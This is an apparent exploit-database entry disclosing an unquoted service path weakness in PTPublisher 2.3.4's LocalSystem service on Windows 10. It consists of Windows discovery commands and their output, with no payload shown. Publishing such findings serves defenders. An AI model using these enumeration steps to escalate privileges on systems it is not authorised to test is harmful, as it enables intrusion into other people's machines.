Share
## https://sploitus.com/exploit?id=PACKETSTORM:166753
# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path  
# Discovery by: bios  
# Discovery Date: 2022-18-04  
# Vendor Homepage: https://www.primera.com/  
# Tested Version: 2.3.4  
# Vulnerability Type: Unquoted Service Path  
# Tested on OS: Microsoft Windows 10 Pro x64  
  
# Step to discover Unquoted Service Path:  
  
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"  
|findstr /i /v "c:\windows\\" |findstr /i /v """  
PTProtect  
PTProtect  
C:\Program Files (x86)\Primera  
Technology\PTPublisher\UsbFlashDongleService.exe  
Auto  
  
C:\>sc qc PTProtect  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: PTProtect  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : PTProtect  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
C:\>systeminfo  
  
Host Name: DESKTOP-OUHAB1I  
OS Name: Microsoft Windows 10 Pro  
OS Version: 10.0.19044 N/A Build 19044